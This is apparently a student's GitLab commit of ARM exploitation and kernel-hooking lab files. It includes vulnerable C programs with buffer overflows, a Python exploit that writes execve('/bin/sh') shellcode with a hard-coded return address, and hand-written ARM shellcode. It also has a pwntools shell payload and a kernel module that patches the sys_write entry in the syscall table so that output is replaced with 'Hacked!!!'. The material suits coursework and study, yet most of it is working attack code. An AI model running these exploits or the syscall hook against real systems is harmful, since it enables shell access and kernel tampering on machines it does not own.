손지언 / 2019102185

Go to a project
Toggle navigation Toggle navigation pinning
손지언
986936e6 1 parent e5e9646f

dd

Expand all
Inline Side-by-side
Showing 74 changed files with 618 additions and 0 deletions
No preview for this file type
#include<stdio.h>
#include<string.h>
int main(){
char buf[40];
char temp;
printf("buf = (%p)\n", buf);
temp = fgetc(stdin);
FILE* fp = fopen("input.text","r");
fread(buf,100,1,fp);
printf("%s, \n",buf);
return 0;
}
import struct
f = open("input.text",'wb')
i = int(input())
if(i == 0):
msg = b"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x78'" + b'\x64'*23 + b"\xc8\xf3\xff\x7e"
else:
msg = b"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x78'" + b'\x64'*23 + b"\xe8\x63\xfb\x7e"
f.write(msg)
f.close()
#f = open("input.text",'ab')
#n = input()
#add = int(n,16)
#print(add)
#addr = struct.pack('<L',add)
#f.write(addr)
#f.close()
No preview for this file type
#include <stdio.h>
int main(int argc, char* argv[]){
int len=0;
int i =0;
while(argv[1][i]<='9'&&argv[1][i]>='0'){
len += argv[1][i]-48;
len *= 10;
i++;
}
len /= 10;
printf("%d\n",len);
while(len-->0){
putc('0',stdout);
}
printf("\n");
}
No preview for this file type
#include <stdio.h>
#include <string.h>
#include <err.h>
#include <stdlib.h>
char buf[2048];
int main()
{
if (!fgets(buf, sizeof(buf), stdin))
err(1, "Too long input");
// a few info for debugging
printf("> length: %d\n", (int)strlen(buf));
for (int i = 0; i < strlen(buf); i += 1) {
if (i % 16 == 0)
printf("> %04X: ", i);
printf("%02X ", (unsigned char)buf[i]);
if (i % 16 == 15)
printf("\n");
}
printf("\n");
(*(void (*)()) buf)();
}
\ No newline at end of file
No preview for this file type
No preview for this file type
.section .text
.global _start
_start:
add r0, pc, #12
mov r1, #0
mov r2, #0
mov r7, #11
svc #0
.ascii "/bin/sh\0"
\ No newline at end of file
No preview for this file type
No preview for this file type
No preview for this file type
.section .text
.global _start
_start:
.code 32
add r3, pc, #1
bx r3
.code 16
add r0, pc, #8
eor r1, r1, r1
eor r2, r2, r2
strb r2, [r0, #7]
mov r7, #11
svc #1
.ascii "/bin/shx"
\ No newline at end of file
No preview for this file type
#include<stdio.h>
#include<string.h>
int main(){
char buf[40];
char temp;
printf("buf = (%p)\n", buf);
temp = fgetc(stdin);
FILE* fp = fopen("input.text","r");
fread(buf,100,1,fp);
printf("%s, \n",buf);
return 0;
}
import struct
f = open("input.text",'wb')
i = int(input())
if(i == 0):
msg = b"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x78'" + b'\x64'*23 + b"\xc8\xf3\xff\x7e"
else:
msg = b"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x78'" + b'\x64'*23 + b"\xe8\x63\xfb\x7e"
f.write(msg)
f.close()
#f = open("input.text",'ab')
#n = input()
#add = int(n,16)
#print(add)
#addr = struct.pack('<L',add)
#f.write(addr)
#f.close()
No preview for this file type
No preview for this file type
#include<stdlib.h>
#include<unistd.h>
#include<stdio.h>
int main(int argc, char **argv){
volatile int modified;
char buffer[64];
modified = 0;
gets(buffer);
if(modified != 0){
printf("success!\n");
}
else{
printf("try again!\n");
}
}
No preview for this file type
#include<stdlib.h>
#include<unistd.h>
#include<stdio.h>
#include<string.h>
#include<err.h>
int main(int argc, char **argv){
volatile int modified;
char buffer[64];
if(argc != 2){
perror("argc");
}
modified = 0;
strcpy(buffer,argv[1]);
if(modified == 0x61626364){
printf("success!\n");
}
else{
printf("try again!, you got 0x%08x\n",modified);
}
}
No preview for this file type
#include<stdio.h>
void main(){
system("/bin/sh");
}
export APP_NAME=hello_world
export MOD_NAME=hooker
PWD=$(shell pwd)
APP_PATH=$(PWD)/d$(APP_NAME)
MOD_PATH=$(PWD)/d$(MOD_NAME)
all: $(MOD_NAME) $(APP_NAME)
$(MOD_NAME):
$(MAKE) -C $(MOD_PATH)
mv $(MOD_PATH)/$@.ko $(PWD)
$(APP_NAME):
$(MAKE) -C $(APP_PATH)
mv $(APP_PATH)/$@ $(PWD)
clean:
$(RM) $(PWD)/$(MOD_NAME).ko
$(RM) $(PWD)/$(APP_NAME)
arm-linux-gnueabihf-gcc -C $(MOD_PATH) clean
arm-linux-gnueabihf-gcc -C $(APP_PATH) clean
APP_NAME := hello_world
all:
arm-linux-gnueabihf-gcc -o $(APP_NAME) $(APP_NAME).c
clean:
$(RM) $(APP_NAME).o
#include <stdio.h>
int main(int argc, char *argv[]){
char sHelloMsg[] = {"Hello world!"};
printf(sHelloMsg);
return 0;
}
cmd_/root/hooking/dhooker/hooker.ko := arm-linux-gnueabihf-ld -EL -r -T ./scripts/module-common.lds --build-id -o /root/hooking/dhooker/hooker.ko /root/hooking/dhooker/hooker.o /root/hooking/dhooker/hooker.mod.o
This diff is collapsed. Click to expand it.
This diff is collapsed. Click to expand it.
/root/hooking/dhooker/hooker.ko
/root/hooking/dhooker/hooker.o
obj-m := hooker.o
KDIR=/root/working/linux
PWD=$(shell pwd)
TOOLCHAIN=arm-linux-gnueabihf-
TARGET=arm
all:
$(MAKE) -C $(KDIR) M=$(PWD) ARCH=$(TARGET) CROSS_COMPILE=$(TOOLCHAIN) modules
clean:
$(MAKE) -C $(KDIR) SUBDIRS=$(PWD) clean
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/syscalls.h>
#include <linux/string.h>
#define SYSCALL_TABLE_BASE_ADDR (0x8000fc28)
#define MANAGER_PERMISSION (0xff)
unsigned int ** g_puSysTableAddr = (unsigned int**) SYSCALL_TABLE_BASE_ADDR;
unsigned int g_uPrevAP = 0x00;
unsigned int g_uNewAP = MANAGER_PERMISSION;
unsigned int (* sys_write_orig)(int fd, char *byf, size_t count);
//sys_write_orig() 호출 전 pBuF의 내용 수정
unsigned int sys_write_hooked(int nFD, char *pBuf, size_t nCnt){
if(nFD == 1){
memset(pBuf, 0, nCnt);
strcpy(pBuf, "Hacked!!!\n");
return sys_write_orig(nFD,pBuf, nCnt);
}
else{
return sys_write_orig(nFD,pBuf, nCnt);
}
}
int __init Hook_Init(void){
sys_write_orig = (void *)g_puSysTableAddr[__NR_write];
__asm__ __volatile__("mrc p15, 0, %0, c3, c0" : "=r"(g_uPrevAP));
__asm__ __volatile__("mrc p15, 0, %0, c3, c0" : : "r"(g_uNewAP));
g_puSysTableAddr[__NR_write] = (unsigned int *) sys_write_hooked;
__asm__ __volatile__("mcr p15,0, %0, c3, c0" : :"r"(g_uPrevAP));
return 0;
}
void __exit Hook_Exit(void){
__asm__ __volatile__("mrc p15,0, %0, c3,c0" : "=r"(g_uPrevAP));
__asm__ __volatile__("mcr p15, 0, %0, c3, c0" : :"r"(g_uNewAP));
g_puSysTableAddr[__NR_write] = (unsigned int *) sys_write_orig;
__asm__ __volatile__("mcr p15,0, %0, c3, c0" : :"r"(g_uPrevAP));
}
module_init(Hook_Init);
module_exit(Hook_Exit);
#include <linux/module.h>
#include <linux/vermagic.h>
#include <linux/compiler.h>
MODULE_INFO(vermagic, VERMAGIC_STRING);
__visible struct module __this_module
__attribute__((section(".gnu.linkonce.this_module"))) = {
.name = KBUILD_MODNAME,
.init = init_module,
#ifdef CONFIG_MODULE_UNLOAD
.exit = cleanup_module,
#endif
.arch = MODULE_ARCH_INIT,
};
static const struct modversion_info ____versions[]
__used
__attribute__((section("__versions"))) = {
{ 0xb344870e, __VMLINUX_SYMBOL_STR(module_layout) },
{ 0x2e5810c6, __VMLINUX_SYMBOL_STR(__aeabi_unwind_cpp_pr1) },
{ 0xfa2a45e, __VMLINUX_SYMBOL_STR(__memzero) },
{ 0xb1ad28e0, __VMLINUX_SYMBOL_STR(__gnu_mcount_nc) },
};
static const char __module_depends[]
__used
__attribute__((section(".modinfo"))) =
"depends=";
MODULE_INFO(srcversion, "2DEEDF502E82CB7C5A221F0");
No preview for this file type
No preview for this file type
kernel//root/hooking/dhooker/hooker.ko
No preview for this file type
export APP_NAME=hello_world
export MOD_NAME=hooker
PWD=$(shell pwd)
APP_PATH=$(PWD)/d$(APP_NAME)
MOD_PATH=$(PWD)/d$(MOD_NAME)
all: $(MOD_NAME) $(APP_NAME)
$(MOD_NAME):
$(MAKE) -C $(MOD_PATH)
mv $(MOD_PATH)/$@.ko $(PWD)
$(APP_NAME):
$(MAKE) -C $(APP_PATH)
mv $(APP_PATH)/$@ $(PWD)
clean:
$(RM) $(PWD)/$(MOD_NAME).ko
$(RM) $(PWD)/$(APP_NAME)
arm-linux-gnueabihf-gcc -C $(MOD_PATH) clean
arm-linux-gnueabihf-gcc -C $(APP_PATH) clean
APP_NAME := hello_world
all:
arm-linux-gnueabihf-gcc -o $(APP_NAME) $(APP_NAME).c
clean:
$(RM) $(APP_NAME).o
#include <stdio.h>
int main(int argc, char *argv[]){
char sHelloMsg[] = {"Hello world!\n"};
printf(sHelloMsg);
return 0;
}
cmd_/root/hooking/dhooker/hooker.ko := arm-linux-gnueabihf-ld -EL -r -T ./scripts/module-common.lds --build-id -o /root/hooking/dhooker/hooker.ko /root/hooking/dhooker/hooker.o /root/hooking/dhooker/hooker.mod.o
This diff is collapsed. Click to expand it.
This diff is collapsed. Click to expand it.
/root/hooking/dhooker/hooker.ko
/root/hooking/dhooker/hooker.o
obj-m := hooker.o
KDIR=/root/working/linux
PWD=$(shell pwd)
TOOLCHAIN=arm-linux-gnueabihf-
TARGET=arm
all:
$(MAKE) -C $(KDIR) M=$(PWD) ARCH=$(TARGET) CROSS_COMPILE=$(TOOLCHAIN) modules
clean:
$(MAKE) -C $(KDIR) SUBDIRS=$(PWD) clean
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/syscalls.h>
#include <linux/string.h>
#define SYSCALL_TABLE_BASE_ADDR (0x8000fc28)
#define MANAGER_PERMISSION (0xff)
unsigned int ** g_puSysTableAddr = (unsigned int**) SYSCALL_TABLE_BASE_ADDR;
unsigned int g_uPrevAP = 0x00;
unsigned int g_uNewAP = MANAGER_PERMISSION;
unsigned int (* sys_write_orig)(int fd, char *byf, size_t count);
//sys_write_orig() 호출 전 pBuF의 내용 수정
unsigned int sys_write_hooked(int nFD, char *pBuf, size_t nCnt){
if(current->comm == "hello_world" && nFD == 1){
memset(pBuf, 0, nCnt);
strcpy(pBuf, "Hacked!!!\n");
return sys_write_orig(nFD,pBuf, nCnt);
}
else{
return sys_write_orig(nFD,pBuf, nCnt);
}
}
int __init Hook_Init(void){
sys_write_orig = (void *)g_puSysTableAddr[__NR_write];
__asm__ __volatile__("mrc p15, 0, %0, c3, c0" : "=r"(g_uPrevAP));
__asm__ __volatile__("mrc p15, 0, %0, c3, c0" : : "r"(g_uNewAP));
g_puSysTableAddr[__NR_write] = (unsigned int *) sys_write_hooked;
__asm__ __volatile__("mcr p15,0, %0, c3, c0" : :"r"(g_uPrevAP));
return 0;
}
void __exit Hook_Exit(void){
__asm__ __volatile__("mrc p15,0, %0, c3,c0" : "=r"(g_uPrevAP));
__asm__ __volatile__("mcr p15, 0, %0, c3, c0" : :"r"(g_uNewAP));
g_puSysTableAddr[__NR_write] = (unsigned int *) sys_write_orig;
__asm__ __volatile__("mcr p15,0, %0, c3, c0" : :"r"(g_uPrevAP));
}
module_init(Hook_Init);
module_exit(Hook_Exit);
#include <linux/module.h>
#include <linux/vermagic.h>
#include <linux/compiler.h>
MODULE_INFO(vermagic, VERMAGIC_STRING);
__visible struct module __this_module
__attribute__((section(".gnu.linkonce.this_module"))) = {
.name = KBUILD_MODNAME,
.init = init_module,
#ifdef CONFIG_MODULE_UNLOAD
.exit = cleanup_module,
#endif
.arch = MODULE_ARCH_INIT,
};
static const struct modversion_info ____versions[]
__used
__attribute__((section("__versions"))) = {
{ 0xb344870e, __VMLINUX_SYMBOL_STR(module_layout) },
{ 0x2e5810c6, __VMLINUX_SYMBOL_STR(__aeabi_unwind_cpp_pr1) },
{ 0xfa2a45e, __VMLINUX_SYMBOL_STR(__memzero) },
{ 0xb1ad28e0, __VMLINUX_SYMBOL_STR(__gnu_mcount_nc) },
};
static const char __module_depends[]
__used
__attribute__((section(".modinfo"))) =
"depends=";
MODULE_INFO(srcversion, "D2F3FA25DCB0D285CB3AE41");
No preview for this file type
No preview for this file type
kernel//root/hooking/dhooker/hooker.ko
No preview for this file type
No preview for this file type
export APP_NAME=hello_world
export MOD_NAME=hooker
PWD=$(shell pwd)
APP_PATH=$(PWD)/d$(APP_NAME)
MOD_PATH=$(PWD)/d$(MOD_NAME)
all: $(MOD_NAME) $(APP_NAME)
$(MOD_NAME):
$(MAKE) -C $(MOD_PATH)
mv $(MOD_PATH)/$@.ko $(PWD)
$(APP_NAME):
$(MAKE) -C $(APP_PATH)
mv $(APP_PATH)/$@ $(PWD)
clean:
$(RM) $(PWD)/$(MOD_NAME).ko
$(RM) $(PWD)/$(APP_NAME)
arm-linux-gnueabihf-gcc -C $(MOD_PATH) clean
arm-linux-gnueabihf-gcc -C $(APP_PATH) clean
APP_NAME := hello_world
all:
arm-linux-gnueabihf-gcc -o $(APP_NAME) $(APP_NAME).c
clean:
$(RM) $(APP_NAME).o
#include <stdio.h>
int main(int argc, char *argv[]){
char sHelloMsg[] = {"Hello world!\n"};
printf(sHelloMsg);
return 0;
}
cmd_/root/hooking/dhooker/hooker.ko := arm-linux-gnueabihf-ld -EL -r -T ./scripts/module-common.lds --build-id -o /root/hooking/dhooker/hooker.ko /root/hooking/dhooker/hooker.o /root/hooking/dhooker/hooker.mod.o
This diff is collapsed. Click to expand it.
This diff is collapsed. Click to expand it.
/root/hooking/dhooker/hooker.ko
/root/hooking/dhooker/hooker.o
obj-m := hooker.o
KDIR=/root/working/linux
PWD=$(shell pwd)
TOOLCHAIN=arm-linux-gnueabihf-
TARGET=arm
all:
$(MAKE) -C $(KDIR) M=$(PWD) ARCH=$(TARGET) CROSS_COMPILE=$(TOOLCHAIN) modules
clean:
$(MAKE) -C $(KDIR) SUBDIRS=$(PWD) clean
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/syscalls.h>
#include <linux/string.h>
#define SYSCALL_TABLE_BASE_ADDR (0x8000fc28)
#define MANAGER_PERMISSION (0xff)
unsigned int ** g_puSysTableAddr = (unsigned int**) SYSCALL_TABLE_BASE_ADDR;
unsigned int g_uPrevAP = 0x00;
unsigned int g_uNewAP = MANAGER_PERMISSION;
unsigned int (* sys_write_orig)(int fd, char *byf, size_t count);
//sys_write_orig() 호출 전 pBuF의 내용 수정
unsigned int sys_write_hooked(int nFD, char *pBuf, size_t nCnt){
printk("current process name : %s\n",current->comm);
if(current->comm == "hello_world" && nFD == 1){
memset(pBuf, 0, nCnt);
strcpy(pBuf, "Hacked!!!\n");
return sys_write_orig(nFD,pBuf, nCnt);
}
else{
return sys_write_orig(nFD,pBuf, nCnt);
}
}
int __init Hook_Init(void){
sys_write_orig = (void *)g_puSysTableAddr[__NR_write];
__asm__ __volatile__("mrc p15, 0, %0, c3, c0" : "=r"(g_uPrevAP));
__asm__ __volatile__("mrc p15, 0, %0, c3, c0" : : "r"(g_uNewAP));
g_puSysTableAddr[__NR_write] = (unsigned int *) sys_write_hooked;
__asm__ __volatile__("mcr p15,0, %0, c3, c0" : :"r"(g_uPrevAP));
return 0;
}
void __exit Hook_Exit(void){
__asm__ __volatile__("mrc p15,0, %0, c3,c0" : "=r"(g_uPrevAP));
__asm__ __volatile__("mcr p15, 0, %0, c3, c0" : :"r"(g_uNewAP));
g_puSysTableAddr[__NR_write] = (unsigned int *) sys_write_orig;
__asm__ __volatile__("mcr p15,0, %0, c3, c0" : :"r"(g_uPrevAP));
}
module_init(Hook_Init);
module_exit(Hook_Exit);
#include <linux/module.h>
#include <linux/vermagic.h>
#include <linux/compiler.h>
MODULE_INFO(vermagic, VERMAGIC_STRING);
__visible struct module __this_module
__attribute__((section(".gnu.linkonce.this_module"))) = {
.name = KBUILD_MODNAME,
.init = init_module,
#ifdef CONFIG_MODULE_UNLOAD
.exit = cleanup_module,
#endif
.arch = MODULE_ARCH_INIT,
};
static const struct modversion_info ____versions[]
__used
__attribute__((section("__versions"))) = {
{ 0xb344870e, __VMLINUX_SYMBOL_STR(module_layout) },
{ 0x2e5810c6, __VMLINUX_SYMBOL_STR(__aeabi_unwind_cpp_pr1) },
{ 0xfa2a45e, __VMLINUX_SYMBOL_STR(__memzero) },
{ 0x27e1a049, __VMLINUX_SYMBOL_STR(printk) },
{ 0xb1ad28e0, __VMLINUX_SYMBOL_STR(__gnu_mcount_nc) },
};
static const char __module_depends[]
__used
__attribute__((section(".modinfo"))) =
"depends=";
MODULE_INFO(srcversion, "1041E4758432C86606FD67E");
No preview for this file type
No preview for this file type
kernel//root/hooking/dhooker/hooker.ko
No preview for this file type
No preview for this file type
from pwn import *
context.update(arch='arm', os='linux')
shellcode = shellcraft.to_thumb()
shellcode += shellcraft.thumb.linux.sh()